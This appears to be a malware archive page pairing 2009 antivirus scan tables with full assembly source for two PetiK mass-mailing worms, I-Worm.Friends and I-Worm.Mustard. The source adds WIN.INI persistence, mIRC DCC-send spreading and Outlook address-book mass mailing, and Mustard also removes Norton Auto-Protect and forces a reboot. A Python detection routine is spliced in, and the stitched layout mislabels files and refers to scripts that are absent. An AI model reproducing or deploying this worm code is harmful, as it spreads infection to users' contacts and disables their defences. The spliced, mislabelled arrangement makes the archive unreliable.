File Bother.htm received on 05.16.2009 11:20:32 (CET)

Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Virus.VBS.Both!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.15 | HTML/Bother
AntiVir | 7.9.0.168 | 2009.05.15 | VBS/Both
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Virus/VBS.VBS
Authentium | 5.1.2.4 | 2009.05.15 | VBS/Both.A
Avast | 4.8.1335.0 | 2009.05.15 | VBS:Malware-gen
AVG | 8.5.0.336 | 2009.05.15 | VBS/Bother.A
BitDefender | 7.2 | 2009.05.16 | VBS.Both.A
CAT-QuickHeal | 10.00 | 2009.05.15 | VBS/Both.A
ClamAV | 0.94.1 | 2009.05.15 | VBS.Startpage-1
Comodo | 1157 | 2009.05.08 | -
DrWeb | 5.0.0.12182 | 2009.05.16 | VBS.Bother
eSafe | 7.0.17.0 | 2009.05.14 | Virus.VBS.Both
eTrust-Vet | 31.6.6508 | 2009.05.16 | VBS/Both
F-Prot | 4.4.4.56 | 2009.05.15 | VBS/Both.A
F-Secure | 8.0.14470.0 | 2009.05.15 | Virus.VBS.Both
Fortinet | 3.117.0.0 | 2009.05.16 | VBS/Both.A
GData | 19 | 2009.05.16 | VBS.Both.A
Ikarus | T3.1.1.49.0 | 2009.05.16 | Virus.VBS.Both
K7AntiVirus | 7.10.735 | 2009.05.14 | -
Kaspersky | 7.0.0.125 | 2009.05.16 | Virus.VBS.Both
McAfee | 5616 | 2009.05.15 | VBS/Bother
McAfee+Artemis | 5616 | 2009.05.15 | VBS/Bother
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Script.Both
Microsoft | 1.4602 | 2009.05.16 | Virus:VBS/SYSID
NOD32 | 4080 | 2009.05.15 | VBS/Bother
Norman | 6.01.05 | 2009.05.16 | VBS/Both.K
nProtect | 2009.1.8.0 | 2009.05.16 | VBS.Both.A
Panda | 10.0.0.14 | 2009.05.15 | Univ.A
PCTools | 4.4.2.0 | 2009.05.15 | VBS.Bother.A
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Script.HTML.Both
Sophos | 4.41.0 | 2009.05.16 | VBS/Bother
Sunbelt | 3.2.1858.2 | 2009.05.16 | Virus.VBS.Both (v)
Symantec | 1.4.4.12 | 2009.05.16 | VBS.Bother.3180
TheHacker | 6.3.4.1.326 | 2009.05.15 | -
TrendMicro | 8.950.0.1092 | 2009.05.15 | HTML_BOTHER.A
VBA32 | 3.12.10.5 | 2009.05.16 | Virus.VBS.Both
ViRobot | 2009.5.15.1737 | 2009.05.15 | VBS.Both
VirusBuster | 4.6.5.0 | 2009.05.15 | VBS.Bother.A

Additional information
File size: 3255 bytes
MD5: 915aaf9b61f0d62c1fc2082198b324be
SHA1: e2bf913ffca85e796ecef0564a896625dc748332

comment #
Name   : I-Worm.Friends
Author : PetiK
Date   : May 13th - May 15th 2001
Action : This worm uses a VBS script and Microsoft Outlook to spread.
It copies itself to \%SYSTEM%\Iesetup.exe.
WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe.
It creates a script file for mIRC in C:\mirc and C:\mirc32.
The first time it runs, it shows a fake WinZip message box.
The worm creates C:\Friends and writes the file maya.vbs there to spread.
It changes the values under HKLM\Software\Microsoft\Windows\CurrentVersion:
  RegisteredOwner        : Maya, Laurent, Etienne
  RegisteredOrganization : PetiK Corporation
On the 5th of every month, it shows a message box.
#
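The two host artifacts this description names, a run= line under [windows] in WIN.INI and a mIRC script.ini whose on JOIN handler DCC-sends a file to every joiner, are the same shape that the W32.TWIN, NetWork.A and ShowVar scripts above write, so one parser covers all of them. This is an added detection example for this archive, not PetiK's code; the WIN.INI and script.ini contents below are constructed samples.

```python
"""Flag the WIN.INI run= persistence and the mIRC on JOIN / dcc send spreader
described above.  Added example; the sample file contents are constructed."""
import configparser
import re
from typing import Dict, List

# Constructed WIN.INI fragment of the shape the worm leaves behind.
SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\Iesetup.exe
NullPort=None

[Desktop]
Wallpaper=(None)
"""

# Constructed script.ini with the on JOIN / dcc send layout used above.
SAMPLE_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\Iesetup.exe
n3=}
"""

# Constructed benign script.ini: an on JOIN handler that only echoes.
BENIGN_SCRIPT_INI = """[script]
n0=on 1:JOIN:#:{ /echo -a $nick joined $chan }
"""

# Event header "on <level>:JOIN:<channel>:..." (mIRC is case-insensitive).
JOIN_EVENT = re.compile(r"^\s*on\s+\S+:JOIN:", re.IGNORECASE)
# "/dcc send $nick <file>", the echo-suppressed "/.dcc send" variant and the
# PIRCH "dcc tsend" spelling; group 1 is the file pushed to the joiner.
DCC_SEND = re.compile(r"/?\.?dcc\s+t?send\s+\$nick\s+(\S+)", re.IGNORECASE)


def _parse_ini(text: str) -> configparser.ConfigParser:
    """Parse a Windows-style INI: keys keep their case, '$' is not interpolated."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp


def win_ini_run_entries(text: str) -> List[str]:
    """Programs started from run= in [windows]; WIN.INI separates them by comma or space."""
    cp = _parse_ini(text)
    if not cp.has_section("windows"):
        return []
    value = cp.get("windows", "run", fallback="")
    return [p for p in re.split(r"[,\s]+", value.strip()) if p]


def mirc_dcc_on_join(text: str) -> List[str]:
    """Files that the [script] section DCC-sends from an on JOIN handler.

    mIRC stores the script body as n0=, n1=, ... lines; they are read back in
    file order and the handler is tracked by brace depth, so the multi-line
    form above and a one-line handler are both covered.
    """
    cp = _parse_ini(text)
    if not cp.has_section("script"):
        return []
    sent: List[str] = []
    in_join, depth = False, 0
    for _, line in cp.items("script"):
        if not in_join and JOIN_EVENT.match(line):
            in_join, depth = True, 0
        if in_join:
            m = DCC_SEND.search(line)
            if m:
                sent.append(m.group(1))
            depth += line.count("{") - line.count("}")
            if depth <= 0:
                in_join = False
    return sent


def scan_artifacts(win_ini: str, script_ini: str) -> Dict[str, List[str]]:
    """Run both checks; an empty list means that artifact is absent."""
    return {
        "win_ini_run": win_ini_run_entries(win_ini),
        "mirc_dcc_on_join": mirc_dcc_on_join(script_ini),
    }


if __name__ == "__main__":
    for name, hits in scan_artifacts(SAMPLE_WIN_INI, SAMPLE_SCRIPT_INI).items():
        print(f"{name}: {hits or 'none'}")
    print("benign script.ini:", mirc_dcc_on_join(BENIGN_SCRIPT_INI) or "none")
```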
.386 jumps locals .model flat,stdcall
;KERNEL32.dll extrn WritePrivateProfileStringA:PROC extrn lstrcat:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn ExitProcess:PROC extrn CloseHandle:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetSystemTime:PROC extrn GetWindowsDirectoryA:PROC extrn WinExec:PROC extrn WriteFile:PROC
;USER32.dll extrn MessageBoxA:PROC
;ADVAPI32.dll extrn RegOpenKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC
.data szOrig db 50 dup (0) szPTK db 50 dup (0) szWin db 50 dup (0) FileHandle dd ? RegHandle dd ? octets dd ? winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h Copie db "\Iesetup.exe",00h inifile db "\petik",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h VBS db "C:\Friends\maya.vbs",00h DIR db "C:\Friends",00h OWN_D db "RegisteredOwner",00h OWN_S db "Maya, Laurent, Etienne",00h ORG_D db "RegisteredOrganization",00h ORG_S db "PetiK Corporation",00h SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h TITRE db "WinZip Self-Extractor",00h TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h TITRE2 db "I-Worm.Friends",00h TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah db "",0dh,0ah db "To my friends Maya and Laurent",00h email db "wscript C:\Friends\maya.vbs",00h FILE_ATTRIBUTE_READONLY equ 00000001h CREATE_NEW equ 00000001h CREATE_ALWAYS equ 00000002h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h HKEY_LOCAL_MACHINE equ 80000002h KEY_SET_VALUE equ 00000002h REG_SZ equ 00000001h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <> petikd: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",00h PETIKTAILLE equ $-petikd mayad: db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Next',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah MAYATAILLE equ $-mayad .code DEBUT: PREPAR: push 50 push offset szCopie call GetSystemDirectoryA push offset Copie push offset szCopie call lstrcat FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script push offset szPTK call GetWindowsDirectoryA push offset inifile push offset szPTK call lstrcat push 00h push FILE_ATTRIBUTE_READONLY push CREATE_NEW push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset szPTK ; success ? continue call CreateFileA cmp eax,-1 je BDR ; or else, jump to label BDR mov [FileHandle],eax push 00h push offset octets push PETIKTAILLE push offset petikd push [FileHandle] call WriteFile push [FileHandle] call CloseHandle ; the file is create
MIRC:
 push 00h
 push offset script1
 push offset szPTK
 call CopyFileA ; copy the file to C:\mirc
 push 00h
 push offset script2
 push offset szPTK
 call CopyFileA ; and to C:\mirc32
EMAIL:
 push 00h
 push offset DIR
 call CreateDirectoryA ; Create the directory C:\Friends
 push 00h
 push FILE_ATTRIBUTE_READONLY
 push CREATE_ALWAYS
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset VBS
 call CreateFileA ; and write the VBS file maya.vbs there
 mov [FileHandle],eax
 push 00h
 push offset octets
 push MAYATAILLE
 push offset mayad
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
ENVOIE:
 push 01h
 push offset email
 call WinExec ; run this file
COPIE:
 push 00h
 call GetModuleHandleA
 push 50
 push offset szOrig
 push eax
 call GetModuleFileNameA
 push 00h
 push offset szCopie
 push offset szOrig
 call CopyFileA ; Copy our file to \%SYSTEM%\Iesetup.exe
WIN_INI:
 push 50h
 push offset szWin
 call GetWindowsDirectoryA
 push offset winini
 push offset szWin
 call lstrcat
 push offset szWin ; Write to the WIN.INI file in the run section
 push offset szCopie ; [windows]
 push offset run ; run=\%SYSTEM%\Iesetup.exe
 push offset windows
 call WritePrivateProfileStringA
MESS:
 push 10h ; Show the fake error message
 push offset TITRE
 push offset TEXTE
 push 00h
 call MessageBoxA
BDR:
 push offset RegHandle
 push KEY_SET_VALUE
 push 00h
 push offset SOUS_CLE
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
 push 02h
 push offset OWN_D
 push offset REG_SZ
 push 00h
 push offset OWN_S
 push [RegHandle]
 call RegSetValueExA ; Change the name of the Registered Owner
 push 02h
 push offset ORG_D
 push offset REG_SZ
 push 00h
 push offset ORG_S
 push [RegHandle]
 call RegSetValueExA ; Change the name of the Registered Organization
 push [RegHandle]
 call RegCloseKey
DATE:
 push offset SystemTime
 call GetSystemTime
 cmp [SystemTime.wDay],05h ; 5th of the month ?
 jne FIN
 push 40h
 push offset TITRE2
 push offset TEXTE2
 push 00h
 call MessageBoxA ; Show a message box
FIN:
 push 00h
 call ExitProcess
end DEBUT

File Friends.exe received on 05.16.2009 11:58:15 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | Email-Worm.Win32.Petik!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.15 | Win32/PetTick.6656
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Petik.15
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Win32
Authentium | 5.1.2.4 | 2009.05.15 | W32/Malware!543d
Avast | 4.8.1335.0 | 2009.05.15 | Win32:PetiK-Friends
AVG | 8.5.0.336 | 2009.05.15 | I-Worm/Petik.B
BitDefender | 7.2 | 2009.05.16 | Generic.Malware.IM.34A9CFBA
CAT-QuickHeal | 10.00 | 2009.05.15 | W32.Petik.B
ClamAV | 0.94.1 | 2009.05.15 | W32.PetTick
Comodo | 1157 | 2009.05.08 | -
DrWeb | 5.0.0.12182 | 2009.05.16 | Win32.Petik.6656
eSafe | 7.0.17.0 | 2009.05.14 | -
eTrust-Vet | 31.6.6508 | 2009.05.16 | Win32/Petik.6656.A
F-Prot | 4.4.4.56 | 2009.05.15 | W32/Malware!543d
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.16 | W32/PetTick.B@mm
GData | 19 | 2009.05.16 | Generic.Malware.IM.34A9CFBA
Ikarus | T3.1.1.49.0 | 2009.05.16 | Email-Worm.Win32.Petik
K7AntiVirus | 7.10.735 | 2009.05.14 | Email-Worm.Win32.Petik
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Petik
McAfee | 5616 | 2009.05.15 | W32/PetTick@MM
McAfee+Artemis | 5616 | 2009.05.15 | W32/PetTick@MM
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Petik.15
Microsoft | 1.4602 | 2009.05.16 | Worm:Win32/Petik.B
NOD32 | 4080 | 2009.05.15 | Win32/Petik.B
Norman | 6.01.05 | 2009.05.16 | W32/Pet_Tick.6656.B
nProtect | 2009.1.8.0 | 2009.05.16 | Worm/W32.Petik.6656.C
Panda | 10.0.0.14 | 2009.05.16 | W32/Petik.B
PCTools | 4.4.2.0 | 2009.05.15 | VBS.LoveLetter
Prevx | 3.0 | 2009.05.16 | -
Rising | 21.29.52.00 | 2009.05.16 | Worm.Mail.Petik.v
Sophos | 4.41.0 | 2009.05.16 | W32/Petik-B
Sunbelt | 3.2.1858.2 | 2009.05.16 | Friends worm
Symantec | 1.4.4.12 | 2009.05.16 | W95.Pet_Tick.gen
TheHacker | 6.3.4.1.326 | 2009.05.15 | W32/PetTick@MM
TrendMicro | 8.950.0.1092 | 2009.05.15 | WORM_PET.TICK.B
VBA32 | 3.12.10.5 | 2009.05.16 | Win32.Worm.Petik.8192
ViRobot | 2009.5.15.1737 | 2009.05.15 | I-Worm.Win32.PetTick.6656.A
VirusBuster | 4.6.5.0 | 2009.05.15 | VBS.LoveLetter
Additional information
File size: 6656 bytes
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8

comment #
Name : I-Worm.Mustard
Author : PetiK
Date : May 10th - 27th
Size : 7168 bytes
Action : When the worm is first executed, it creates the key HKCU\Software\[PetiK]. It then copies itself as Windows\AVUpdate.exe and alters the run= line in the Win.ini file to: run=Windows\AVUpdate.exe. It tries to delete the value "Norton Auto-Protect" from the Run key of the registry. If that succeeds, it alters "Exclude.dat" so that Norton Antivirus does not scan the VBS file. It shows a message box and reboots the computer. On the next start, it creates a VBS worm with the attributes "readonly" and "hidden". On June 17th, it shows a message box.
#
.386
jumps
locals
.model flat,stdcall

extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn RegCreateKeyExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC
.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
szOrig db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
run db "run",00h
windows db "windows",00h
Winini db "\\WIN.INI",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h
TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
db "",0dh,0ah
db "Small but Pretty",0dh,0ah
db "I Love You",0dh,0ah
db "Since January",0dh,0ah
db "I Think Of You",00h

HKEY_LOCAL_MACHINE equ 80000002h
HKEY_CURRNET_USER equ 80000001h
KEY_ALL_ACCESS equ 0000003Fh
FILE_ATTRIBUTE_READONLY equ 00000001h
FILE_ATTRIBUTE_HIDDEN equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
OPEN_EXISTING equ 00000003h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
FILE_END equ 00000002h
EWX_REBOOT equ 00000002h
EWX_FORCE equ 00000004h
SYSTIME struct
 wYear WORD ?
 wMonth WORD ?
 wDayOfWeek WORD ?
 wDay WORD ?
 wHour WORD ?
 wMinute WORD ?
 wSecond WORD ?
 wMillisecond WORD ?
SYSTIME ends
SystemTime SYSTIME <>

mircd:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= ./dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
MIRCTAILLE equ $-mircd

sendd:
db 'ENTREE()',0dh,0ah
db 'Sub ENTREE',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "AntiVirus Update"',0dh,0ah
db 'N.Body = "The last version of your AV"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
SENDTAILLE equ $-sendd

datd:
db 02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd

.code
DEBUT:
VERIF:
 push offset regDisp
 push offset regResu
 push 00h
 push 0F003Fh
 push 00h
 push 00h ; HKCU\Software\[PetiK] exist ?
 push 00h
 push offset CLE
 push HKEY_CURRNET_USER
 call RegCreateKeyExA
 push [regResu]
 call RegCloseKey
 cmp [regDisp],1
 jne EMAIL ; YES => EMAIL
COPIE:
 push 00h
 call GetModuleHandleA
 push 50
 push offset szOrig
 push eax
 call GetModuleFileNameA
 push 50
 push offset szCopie
 call GetWindowsDirectoryA
 push offset Copie
 push offset szCopie
 call lstrcat
 push offset szCopie
 push offset szOrig
 call CopyFileA ; Copy itself to \WINDIR\AVUpdate.exe
WIN_INI:
 push 50
 push offset szWin
 call GetWindowsDirectoryA
 push offset Winini
 push offset szWin
 call lstrcat
 push offset szWin ; Alters the run= line in WIN.INI
 push offset szCopie
 push offset run
 push offset windows ; run=\WINDIR\AVUpdate.exe
 call WritePrivateProfileStringA
MIRC1:
 push 00h
 push FILE_ATTRIBUTE_READONLY
 push CREATE_ALWAYS
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset mirc
 call CreateFileA
 mov [FileHandle],eax
 push 00h
 push offset octets
 push MIRCTAILLE
 push offset mircd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle ; Create an ini script for mIRC
MIRC2:
 push 00h
 push offset script1
 push offset mirc
 call CopyFileA ; Copy to \mirc
 push 00h
 push offset script2
 push offset mirc
 call CopyFileA ; \mirc32
 push 00h
 push offset script3
 push offset mirc
 call CopyFileA ; \Program Files\mirc
 push 00h
 push offset script4
 push offset mirc
 call CopyFileA ; \Program Files\mirc32
 push offset mirc
 call DeleteFileA ; and delete the first file
DEL_REG:
 push offset RegHandle
 push KEY_ALL_ACCESS
 push 00h
 push offset CLE_RUN
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
VAL1:
 push offset NAV ; Try to delete the "Norton Auto-Protect" value
 push [RegHandle]
 call RegDeleteValueA
 test eax,eax
 jnz EMAIL ; NO => jmp EMAIL
 push [RegHandle]
 call RegCloseKey
NORTON:
 push offset RegHandle
 push 001F0000h
 push 00h
 push offset CLE_NOR
 push HKEY_LOCAL_MACHINE
 call RegOpenKeyExA
 test eax,eax
 jnz FIN
 push offset BufferSize
 push offset Buffer
 push offset ValueType
 push 00h ; Look up the "InstallDir" of Norton
 push offset Value
 push RegHandle
 call RegQueryValueExA
 push [RegHandle]
 call RegCloseKey
TRAFIC:
 push offset filedat
 push offset Buffer
 call lstrcat
 push offset Buffer
 call GetFileAttributesA
 cmp eax,FILE_ATTRIBUTE_READONLY ; Is the file read-only ?
 je FIN ; YES => FIN
 push 00h
 push FILE_ATTRIBUTE_NORMAL
 push OPEN_EXISTING
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset Buffer
 call CreateFileA
 cmp eax,-1
 je REBOOT ; File exists ? NO => jmp REBOOT
 mov [FileHandle],eax
 push FILE_END
 push 00h
 push [Dist]
 push [FileHandle]
 call SetFilePointer ; End of the file
 push 00h
 push offset octets
 push DATTAILLE
 push offset datd
 push [FileHandle]
 call WriteFile ; Write the data
 push [FileHandle]
 call CloseHandle
 push 5000
 call Sleep ; Wait 5 seconds
 push FILE_ATTRIBUTE_READONLY
 push offset Buffer
 call SetFileAttributesA ; Set the read-only attribute on the file
MESSAGE:
 push 40h
 push offset TITRE
 push offset TEXTE
 push 00h
 call MessageBoxA
REBOOT:
 push EWX_REBOOT or EWX_FORCE
 call ExitWindowsEx
EMAIL:
 push 00h
 push FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN
 push CREATE_NEW
 push 00h
 push FILE_SHARE_READ
 push GENERIC_WRITE
 push offset VBS ; success ? continue
 call CreateFileA
 cmp eax,-1
 je DATE ; otherwise, jump to label DATE
 mov [FileHandle],eax
 push 00h
 push offset octets
 push SENDTAILLE
 push offset sendd
 push [FileHandle]
 call WriteFile
 push [FileHandle]
 call CloseHandle
ENVOIE:
 push 01h
 push offset email
 call WinExec
ATTEND:
 push 10000
 call Sleep
EFFACE:
 push offset VBS
 call DeleteFileA
DATE:
 push offset SystemTime
 call GetSystemTime
 cmp [SystemTime.wDay],11h
 jne FIN
 cmp [SystemTime.wDay],06h
 jne FIN
 push 40h
 push offset TITRE2
 push offset TEXTE2
 push 00h
 call MessageBoxA
FIN:
 push 00h
 call ExitProcess
end DEBUT

File Mustard.exe received on 05.16.2009 17:59:52 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | VBS.Lee.Based!IK
AhnLab-V3 | 5.0.0.2 | 2009.05.16 | -
AntiVir | 7.9.0.168 | 2009.05.15 | Worm/Petik.18
Antiy-AVL | 2.0.3.1 | 2009.05.15 | Worm/Win32.Win32
Authentium | 5.1.2.4 | 2009.05.16 | W32/Malware!989a
Avast | 4.8.1335.0 | 2009.05.15 | Win32:Petik-Mustard
AVG | 8.5.0.336 | 2009.05.15 | I-Worm/Petik.U
BitDefender | 7.2 | 2009.05.16 | Win32.Mustar.A@mm
CAT-QuickHeal | 10.00 | 2009.05.15 | W32.Petik.D
ClamAV | 0.94.1 | 2009.05.16 | Worm.Petik.d
Comodo | 1157 | 2009.05.08 | Worm.Win32.Petik.D
DrWeb | 5.0.0.12182 | 2009.05.16 | Win32.Petik.7168
eSafe | 7.0.17.0 | 2009.05.14 | -
eTrust-Vet | 31.6.6508 | 2009.05.16 | Win32/Petik.7168.A
F-Prot | 4.4.4.56 | 2009.05.16 | W32/Malware!989a
F-Secure | 8.0.14470.0 | 2009.05.15 | Email-Worm.Win32.Petik
Fortinet | 3.117.0.0 | 2009.05.16 | W32/PetTick.U@mm
GData | 19 | 2009.05.16 | Win32.Mustar.A@mm
Ikarus | T3.1.1.49.0 | 2009.05.16 | VBS.Lee.Based
K7AntiVirus | 7.10.737 | 2009.05.16 | Email-Worm.Win32.Petik
Kaspersky | 7.0.0.125 | 2009.05.16 | Email-Worm.Win32.Petik
McAfee | 5616 | 2009.05.15 | W32/PetTick@MM
McAfee+Artemis | 5616 | 2009.05.15 | W32/PetTick@MM
McAfee-GW-Edition | 6.7.6 | 2009.05.15 | Worm.Petik.18
Microsoft | 1.4602 | 2009.05.16 | Worm:Win32/Petik.D@mm
NOD32 | 4080 | 2009.05.15 | Win32/Petik.D
Norman | 6.01.05 | 2009.05.16 | W32/Pet_Tick.7168
nProtect | 2009.1.8.0 | 2009.05.16 | -
Panda | 10.0.0.14 | 2009.05.16 | W32/Petik.D
PCTools | 4.4.2.0 | 2009.05.16 | Worm.Petik
Prevx | 3.0 | 2009.05.16 | Medium Risk Malware
Rising | 21.29.52.00 | 2009.05.16 | Worm.Mail.Petik.y
Sophos | 4.41.0 | 2009.05.16 | W32/Petik-D
Sunbelt | 3.2.1858.2 | 2009.05.16 | Worm.Petik
Symantec | 1.4.4.12 | 2009.05.16 | W95.Pet_Tick.gen
TheHacker | 6.3.4.1.326 | 2009.05.15 | W32/PetTick@MM
TrendMicro | 8.950.0.1092 | 2009.05.15 | WORM_PET.TICK.U
VBA32 | 3.12.10.5 | 2009.05.16 | Win32.Worm.Petik.8192
ViRobot | 2009.5.15.1737 | 2009.05.15 | -
Additional information
File size: 7168 bytes
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d

<!-- Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS
' Copies itself into %WINDIR%\WinHelp.htm
' Modifies AUTOEXEC.BAT to display a message
' Modifies the Start Page of Internet Explorer to the WinHelp.htm file
' Forces Internet Explorer into full screen
' Spreads with mIRC
' Infects all HTM and HTML files in %WINDIR%\Web\Wallpaper
' If the day is the 5th or the 17th it runs "cdplayer.exe", "notepad.exe", etc... -->
File Embargo.htm received on 05.16.2009 11:30:48 (CET)
Antivirus | Version | Last Update | Result
a-squared | 4.0.0.101 | 2009.05.16 | VBS.Embargo!IK
